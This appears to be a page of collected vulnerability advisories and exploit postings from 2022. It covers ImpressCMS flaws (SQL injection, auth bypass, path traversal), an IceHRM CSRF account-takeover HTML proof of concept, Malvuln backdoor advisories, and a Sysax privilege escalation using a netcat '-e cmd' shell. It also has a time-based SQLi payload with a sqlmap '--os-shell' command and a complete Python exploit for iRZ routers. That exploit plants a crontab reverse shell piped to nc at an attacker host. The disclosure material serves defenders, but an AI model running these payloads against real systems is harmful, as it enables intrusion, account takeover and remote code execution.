<pre><code>---------------------------------------------------------------<br />ImpressCMS <= 1.4.3 (findusers.php) SQL Injection Vulnerability<br />---------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.impresscms.org<br /><br /><br />[-] Affected Versions:<br /><br />Version 1.4.3 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located in the /include/findusers.php script:<br /><br />281. $total = <br />$user_handler->getUserCountByGroupLink(@$_POST["groups"], $criteria);<br />282.<br />283. $validsort = array("uname", "email", "last_login", <br />"user_regdate", "posts");<br />284. $sort = (!in_array($_POST['user_sort'], $validsort)) ? <br />"uname" : $_POST['user_sort'];<br />285. $order = "ASC";<br />286. if (isset($_POST['user_order']) && $_POST['user_order'] <br />== "DESC") {<br />287. $order = "DESC";<br />288. }<br />289.<br />290. $criteria->setSort($sort);<br />291. $criteria->setOrder($order);<br />292. $criteria->setLimit($limit);<br />293. $criteria->setStart($start);<br />294. $foundusers = <br />$user_handler->getUsersByGroupLink(@$_POST["groups"], $criteria, TRUE);<br /><br />User input passed through the "groups" POST parameter is not properly <br />sanitized before being passed to the <br />icms_member_Handler::getUserCountByGroupLink() and <br />icms_member_Handler::getUsersByGroupLink() methods at lines 281 and 294. <br />These methods use the first argument to construct a SQL query without <br />proper validation, and this can be exploited by remote attackers to e.g. <br />read sensitive data from the "users" database table through <br />boolean-based SQL Injection attacks. The application allows for stacked <br />SQL queries, as such this vulnerability could be exploited to e.g. <br />create a new admin user and execute arbitrary PHP code.<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 1.4.4 or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[19/01/2021] - Vendor notified through HackerOne<br />[29/01/2021] - Vulnerability acknowledged by the vendor<br />[03/02/2021] - CVE number assigned<br />[06/02/2022] - Version 1.4.3 released, vulnerability not correctly fixed<br />[11/02/2022] - Vendor was informed about the ineffective fix<br />[09/03/2022] - Version 1.4.4 released<br />[22/03/2022] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2021-26599 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://hackerone.com/reports/1081145<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2022-04<br /><br /><br /></code></pre>
<pre><code>--------------------------------------------------------------------------<br />ImpressCMS <= 1.4.2 (findusers.php) Incorrect Access Control Vulnerability<br />--------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.impresscms.org<br /><br /><br />[-] Affected Versions:<br /><br />Version 1.4.2 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located in the /include/findusers.php script:<br /><br />16. include "../mainfile.php";<br />17. xoops_header(false);<br />18.<br />19. $denied = true;<br />20. if (!empty($_REQUEST['token'])) {<br />21. if (icms::$security->validateToken($_REQUEST['token'], false)) {<br />22. $denied = false;<br />23. }<br />24. } elseif (is_object(icms::$user) && icms::$user->isAdmin()) {<br />25. $denied = false;<br />26. }<br />27. if ($denied) {<br />28. icms_core_Message::error(_NOPERM);<br />29. exit();<br />30. } }<br /><br />This script should be accessible to authenticated users only. However, <br />because of the "if" statement at lines 20-23, this script could be <br />accessed by unauthenticated attackers if they will provide a valid <br />security token. Such a token will be generated in several places within <br />the application, and some of them do not require the user to be <br />authenticated, like in the misc.php script. This might be exploited to <br />access an otherwise restricted functionality of the application, which <br />in turn might allow an information disclosure about the CMS users.<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 1.4.3 or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[19/01/2021] - Vendor notified through HackerOne<br />[03/02/2021] - CVE number assigned<br />[06/02/2022] - Version 1.4.3 released<br />[22/03/2022] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2021-26598 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://hackerone.com/reports/1081137<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2022-03<br /><br /><br /></code></pre>
<pre><code>-----------------------------------------------------------------<br />ImpressCMS <= 1.4.2 (image-edit.php) Path Traversal Vulnerability<br />-----------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.impresscms.org<br /><br /><br />[-] Affected Versions:<br /><br />Version 1.4.2 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located in the <br />/libraries/image-editor/image-edit.php script:<br /><br />161. if (@copy ( ICMS_IMANAGER_FOLDER_PATH . '/temp/' . <br />$simage_temp, $categ_path . $simage->getVar ( 'image_name' ) )) {<br />162. if (@unlink ( ICMS_IMANAGER_FOLDER_PATH . '/temp/' . <br />$simage_temp )) {<br />163. $msg = _MD_AM_DBUPDATED;<br /><br />[...]<br /><br />190. } else {<br />191. if (copy ( ICMS_IMANAGER_FOLDER_PATH . '/temp/' . <br />$simage_temp, $categ_path . $imgname )) {<br />192. @unlink ( ICMS_IMANAGER_FOLDER_PATH . '/temp/' . <br />$simage_temp );<br />193. }<br /><br />User input passed through the "image_temp" parameter is not properly <br />sanitized before being used in a call to the unlink() function at lines <br />162 and 192. This can be exploited by authenticated attackers to carry <br />out Path Traversal attacks and delete arbitrary files in the context of <br />the web server process. This vulnerability could be exploited also to <br />disclose the content of arbitrary files in case the web server allows <br />for directory listing.<br /><br />[-] Solution:<br /><br />Upgrade to version 1.4.3 or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[19/01/2021] - Vendor notified through HackerOne<br />[29/01/2021] - Vulnerability acknowledged by the vendor<br />[03/02/2021] - CVE number assigned<br />[06/02/2022] - Version 1.4.3 released<br />[22/03/2022] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2021-26601 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://hackerone.com/reports/1081878<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2022-02<br /><br /><br /></code></pre>
<pre><code># Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover<br /># Date: 18/03/2022<br /># Exploit Author: Devansh Bordia<br /># Vendor Homepage: https://icehrm.com/<br /># Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS<br /># Version: 31.0.0.OS<br />#Tested on: Windows 10<br /><br />1. About - ICEHRM<br />IceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible.<br /><br />2. Description:<br />The application has an update password feature which has a CSRF vulnerability that allows an attacker to change the password of any arbitrary user leading to an account takeover.<br /><br />3. Steps To Reproduce:<br />- Create an User name:Gaurav with permission of the Employee using the Admin User of the application and set his password.<br />- Now login into the application using his credentials and navigate to Update Password Feature to change the password.<br />- Intercept the request in Proxy and we can see there is a GET request used to change password and also NO CSRF Token is being used.<br />- Finally using Burpsuite create CSRF POC and save it as exploit.html.<br />- Now change the password in the POC to any password we want.<br />- Finally we open this POC in the same browser session and click on the submit button.<br />- At last when retrying to login into the application we can see that password has been reset for the account leading to account takeover.<br /><br />4. Vulnerable Request:<br /><br />GET<br />/app/service.php?t=Employee&a=ca&sa=changePassword&mod=modules=employees&req={"current":"Test@123<br />","pwd":"Dummy@123"} HTTP/1.1<br />Host: localhost:8070<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)<br />Gecko/20100101 Firefox/98.0<br />Accept: application/json, text/plain, */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Referer:<br />http://localhost:8070/app/?g=modules&n=employees&m=module_Personal_Information<br />Cookie: PHPSESSID=k8d27ve456j0jb56ga885j1vvb<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />5. Exploit POC (exploit.html)<br /><br /><html><br /><br /><!-- CSRF PoC - generated by Burp Suite Professional --><br /><br /><body><br /><br /><script>history.pushState('', '', '/')</script><br /><br /><form action="http://localhost:8070/app/service.php"><br /><br /><input type="hidden" name="t" value="Employee" /><br /><br /><input type="hidden" name="a" value="ca" /><br /><br /><input type="hidden" name="sa" value="changePassword" /><br /><br /><input type="hidden" name="mod" value="modules=employees" /><br /><br /><input type="hidden" name="req"<br />value="{"current":"Test@123","pwd":"Dummy@123"}"<br />/><br /><br /><input type="submit" value="Submit request" /><br /><br /></form><br /><br /></body><br /><br /></html><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/eba3dd81723ddf33621fd85ded577920.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.BirdSpy.b<br />Vulnerability: Weak Hardcoded Credentials<br />Family: BirdSpy<br />Type: PE32<br />MD5: eba3dd81723ddf33621fd85ded577920<br />Vuln ID: MVID-2022-0523<br />Dropped files: WinSock.exe<br />Disclosure: 03/21/2022<br />Description: The malware listens on TCP port 50829. Authentication is required, however the password "ccbird" is weak and hardcoded in the PE file.<br /><br />00401E0E mov esi, offset Data ; "ccbird"<br />00401E13 push 0 ; flags<br />00401E15 push esi ; Str<br /><br />Built-in commands:<br />==================<br />byby "kill the malware"<br />delp "terminate process"<br />exec "shellexecute pgm"<br />dlog HATE "send a message"<br />getd "get drives"<br />regw "write to registry"<br /><br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 50829<br />ccbird<br />pwok Welcome to Januse's BirdSPY<br />Januse0128<br />sysJanuse0128gsys<br />msgeSystem: Windows NT<br />Version:6.2<br />BuildNumber:9200<br />System Info:''Januse0128<br />Januse0128dlog HATE <br />Januse0128bird<br />BirdSPY Release version 1..by JanuseChiu<br />ME.NCU.EDU.TW...YAJanuse0128<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: iRZ Mobile Router - CSRF to RCE<br /># Google Dork: intitle:"iRZ Mobile Router"<br /># Date: 2022-03-18<br /># Exploit Author: Stephen Chavez & Robert Willis<br /># Vendor Homepage: https://en.irz.ru/<br /># Software Link: https://github.com/SakuraSamuraii/ez-iRZ<br /># Version: Routers through 2022-03-16<br /># Tested on: RU21, RU21w, RL21, RU41, RL01<br /># CVE : CVE-2022-27226<br /><br />import os<br />import requests<br />import json<br />import subprocess<br /><br />option = "0"<br /><br /><br />def main():<br /> print("####################################################")<br /> print("# Welcome to IRZ CSRF to RCE Exploit - version 1.0 #")<br /> print("####################################################")<br /> print()<br /> print("## by RedragonX of WHG & rej_ex of SAKURA SAMURAI ##")<br /> print()<br /> print("1. Post Authentication RCE (Needs Credentials)")<br /> print("2. CSRF to RCE (No Credentials)")<br /> print()<br /> runit()<br /><br /><br />def runit():<br /> option = input("Select an option: ")<br /> if option == "1":<br /> exploit1()<br /> elif option == "2":<br /> exploit2()<br /> else:<br /> print("You must select '1' or '2'. Exiting.")<br /><br /><br />def exploit1():<br /> print("## Running Post Auth RCE exploit")<br /> print()<br /> print()<br /> router_ip = input("## Enter the router ip to exploit: ")<br /> router_port = int(<br /> input("## Enter the victim router web page port (default is 80): ") or "80")<br /><br /> router_user = input("## Enter the username for the router login: ")<br /> router_pass = input("## Enter the password for the router login: ")<br /><br /> LHOST = input("## Enter the LHOST for the router reverse shell: ")<br /> LPORT = input("## Enter the LPORT for the router reverse shell: ")<br /><br /> router_url = f'http://{router_ip}:{router_port}'<br /><br /> nc1_str = f'Start a listener with the following command: nc -lvp {LPORT}'<br /><br /> input(nc1_str + "\n\nPress enter once you do")<br /><br /> send_json_payload(router_url, router_user, router_pass, LHOST, LPORT)<br /><br /><br />def send_json_payload(router_url, router_user, router_pass, lhost_ip, lhost_port):<br /><br /> intro = f'Sending the payload to {router_url}\n'<br /> print(intro)<br /> payload_str = '{"tasks":[{"enable":true,"minutes":"*","hours":"*","days":"*","months":"*","weekdays":"*","command":"rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc ' + \<br /> f'{lhost_ip} {lhost_port} ' + \<br /> '>/tmp/f"}],"_board":{"name":"RL21","platform":"irz_mt02","time":"Wed Mar 16 16:43:20 UTC 2022"}}'<br /><br /> payload_json = json.loads(payload_str)<br /><br /> s = requests.Session()<br /><br /> s.auth = (router_user, router_pass)<br /><br /> s.headers.update(<br /> {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"})<br /> s.headers.update({"X-Requested-With": "XMLHttpRequest"})<br /> s.headers.update({"Origin": router_url})<br /> s.headers.update({"Referer": router_url})<br /><br /> s.post(router_url + "/api/crontab", json=payload_json)<br /><br /> exploit_str = f'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost_ip} 443 >/tmp/f'<br /><br /> print(<br /> "Request sent! You may have to wait about 2 minutes to get a shell. \nFirst shell will die due to crontab job. Start a new listener on a new port [e.g. 443], and run the following command: " + exploit_str)<br /> print("To fix TTY: type telnet 0.0.0.0 in the shell")<br /><br /><br />def exploit2():<br /><br /> print("## Running CSRF to RCE exploit")<br /> print()<br /> print()<br /> router_ip = input("## Enter the router ip to exploit: ")<br /> router_port = int(<br /> input("## Enter the victim router web page port (default is 80): ") or "80")<br /><br /> LHOST = input("## Enter the LHOST for the router reverse shell: ")<br /> LPORT = input("## Enter the LPORT for the router reverse shell: ")<br /><br /> load_csrf_poc_file(router_ip, router_port, LHOST, LPORT)<br /><br /><br />def load_csrf_poc_file(router_ip, router_port, lhost_ip, lhost_port):<br /><br /> file_path = os.path.dirname(__file__) + os.sep + "poc.template.html"<br /><br /> if os.path.isfile(file_path):<br /> with open(file_path) as poc_file:<br /> original_poc_data_str = poc_file.read()<br /><br /> new_html = original_poc_data_str.replace("{router_ip}", router_ip)<br /> new_html = new_html.replace(<br /> "{router_port}", str(router_port))<br /><br /> lhost_split_arr = lhost_ip.split(".")<br /><br /> if len(lhost_split_arr) == 4:<br /><br /> new_html = new_html.replace(<br /> "{lhost_ip_octect_1}", lhost_split_arr[0])<br /><br /> new_html = new_html.replace(<br /> "{lhost_ip_octect_2}", lhost_split_arr[1])<br /><br /> new_html = new_html.replace(<br /> "{lhost_ip_octect_3}", lhost_split_arr[2])<br /> new_html = new_html.replace(<br /> "{lhost_ip_octect_4}", lhost_split_arr[3])<br /><br /> new_html = new_html.replace(<br /> "{lhost_port}", lhost_port)<br /><br /> new_file_path = os.path.dirname(<br /> __file__) + os.sep + "poc.new.html"<br /> try:<br /> with open(new_file_path, 'w') as new_file:<br /> new_file.write(new_html)<br /><br /> print()<br /> print(<br /> f'New file written to {new_file_path}. Host this file')<br /> except FileNotFoundError:<br /> print("You had an error writing to the file, doesn't exist.")<br /> else:<br /> print(f'{lhost_ip} is not a proper IPV4 address.')<br /><br /> else:<br /> print(f'{file_path} not found')<br /><br /><br />main()<br /> <br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/dcbc237f21839a6514c8321d5fa631a4.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Agent.bxxn<br />Vulnerability: Open Proxy<br />Description: The malware listens on TCP port 1080. Third-party attackers who can connect to the infected system can relay requests from the original connection to the destination and then back to the origination system. Attackers may then be able to launch attacks, download files or port scan third party systems and it will appear as the attacks originated from that infected host.<br />Family: Agent<br />Type: PE32<br />MD5: dcbc237f21839a6514c8321d5fa631a4<br />Vuln ID: MVID-2022-0522<br />Disclosure: 03/21/2022<br /><br />Exploit/PoC:<br />curl socks4://192.168.18.125:1080 http://192.168.18.128:21<br />220 INetSim FTP Service ready.<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Author: bzyo (@bzyo_)<br /># Exploit Title: Sysax FTP Automation 6.9.0 - Privilege Escalation<br /># Date: 03-20-2022<br /># Vulnerable Software: Sysax FTP Automation 6.9.0<br /># Vendor Homepage: https://www.sysax.com/<br /># Version: 6.9.0<br /># Software Link: https://www.sysax.com/download/sysaxauto_setup.msi<br /># Tested on: Windows 10 x64<br /><br /># Details:<br />Sysax Scheduler Service runs as Local System. By default the application allows for low privilege users to create/run backup jobs other than themselves. By removing the option to run as current user or another, the task will run as System. A low privilege user could abuse this and escalate their privileges to local system.<br /><br /># Prerequisites:<br />To successfully exploit this vulnerability, an attacker must already have local access to a system running Sysax FTP Automation using a low privileged user account<br /><br /># Exploit:<br />Logged in as low privileged account<br /><br />1. Create folder c:\temp<br />2. Download netcat (nc.exe) to c:\temp<br />3. Create file 'pwn.bat' in c:\temp with contents<br /> c:\temp\nc.exe localhost 1337 -e cmd<br />4. Open command prompt and netcat listener<br /> nc -nlvvp 1337<br />5. Open sysaxschedscp.exe from C:\Program Files (x86)\SysaxAutomation<br />6. Select Setup Scheduled/Triggered Tasks<br /> - Add task (Triggered)<br /> - Update folder to monitor to be c:\temp<br /> - Check 'Run task if a file is added to the monitor folder or subfolder(s)'<br /> - Choose 'Run any other Program' and choose c:\temp\pwn.bat<br /> - Uncheck 'Login as the following user to run task'<br /> - Finish and Save<br />7. Create new text file in c:\temp<br />8. Check netcat listener<br /> C:\WINDOWS\system32>whoami<br /> whoami<br /> nt authority\system<br /><br /></code></pre>
<pre><code>-----------------------------------------------------------------------<br />ImpressCMS <= 1.4.2 (autologin.php) Authentication Bypass Vulnerability<br />-----------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.impresscms.org<br /><br /><br />[-] Affected Versions:<br /><br />Version 1.4.2 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located in the /plugins/preloads/autologin.php script:<br /><br />45. $uname = $myts->stripSlashesGPC($autologinName);<br />46. $pass = $myts->stripSlashesGPC($autologinPass);<br />47. if (empty($uname) || is_numeric($pass)) {<br />48. $user = false ;<br />49. } else {<br />50. // V3<br />51. $uname4sql = addslashes($uname);<br />52. $criteria = new icms_db_criteria_Compo(new <br />icms_db_criteria_Item('login_name', $uname4sql));<br />53. $user_handler = icms::handler('icms_member_user');<br />54. $users = $user_handler->getObjects($criteria, false);<br />55. if (empty($users) || count($users) != 1) {<br />56. $user = false ;<br />57. } else {<br />58. // V3.1 begin<br />59. $user = $users[0] ;<br />60. $old_limit = time() - <br />(defined('ICMS_AUTOLOGIN_LIFETIME') ? ICMS_AUTOLOGIN_LIFETIME : 604800);<br />61. list($old_Ynj, $old_encpass) = explode(':', $pass);<br />62. if (strtotime($old_Ynj) < $old_limit || <br />md5($user->getVar('pass') .<br />63. ICMS_DB_PASS . ICMS_DB_PREFIX . $old_Ynj) <br />!= $old_encpass)<br />64. {<br />65. $user = false;<br />66. }<br /><br />User input passed through the "autologin_uname" and "autologin_pass" <br />cookie values is being used at lines 51-54 to fetch an user object from <br />the database, and then at lines 62-63 to check the correctness of the <br />user's password. The vulnerability exists because of an unsafe way of <br />comparing those parameters, due to comparison operator != is being used <br />instead of !== within the "if" statement at lines 62-63. The latter <br />operator returns "true" only if the compared values are equal and the <br />same type, while the first compares the values after "type juggling". <br />This might be exploited to potentially bypass the authentication <br />mechanism and login as any user without the knowledge of the password.<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 1.4.3 or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[20/01/2021] - Vendor notified through HackerOne<br />[02/02/2021] - Vendor replied this has been resolved and will be in <br />ImpressCMS 1.4.3<br />[03/02/2021] - CVE number assigned<br />[06/02/2022] - Version 1.4.3 released<br />[22/03/2022] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2021-26600 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://hackerone.com/reports/1081986<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2022-01<br /><br /></code></pre>
<pre><code># Title: Inventory Management System 1.0 Blind SQLi To Rce<br /># Author: Hejap Zairy<br /># Date: 12.07.2022<br /># Vendor: https://www.vetbossel.in/inventory-management-system-php/<br /># Software: https://cutt.ly/lOZ8lrr<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /><br />#vulnerability Code php<br /><br />```php<br />You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'abhi@123' WHERE `cust`.`custid` = 'C200114'' at line 2 <br />```<br /><br /><br /><br /><br />#Status: CRITICAL<br />[+] Payload POST:<br />```<br />POST /0day/Edit-Details.php HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 179<br />Origin: https://0day.gov<br />Connection: close<br />Referer: https://0day.gov/0day/Edit-Details.php<br />Cookie: PHPSESSID=o0p5vujcgkn8pm6llls4nj7qq7<br />Upgrade-Insecure-Requests: 1<br />name=ABHI+boss&password=abhi%40123&phone=422234654&email=abhi1%40gmail.com&address=10+HOLME++STREET%27AND (SELECT 5316 FROM (SELECT(SLEEP(5)))Fohe)-- oRCH&cust_update=Submit+Query<br />```<br /><br />#Blind SQLi Time to Rce<br />#ُExploit <br /><br /><br />sqlmap -r 0day_hejap.txt --hex --time-sec=17 --dbms=mysql --technique=t --random-agent --eta -p address -D order_mgmt -T cust --dump -hh --os-shell --priv-esc <br /><br /># Description:<br />The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc<br /><br /># Proof and Exploit:<br />https://streamable.com/s09u80<br /></code></pre>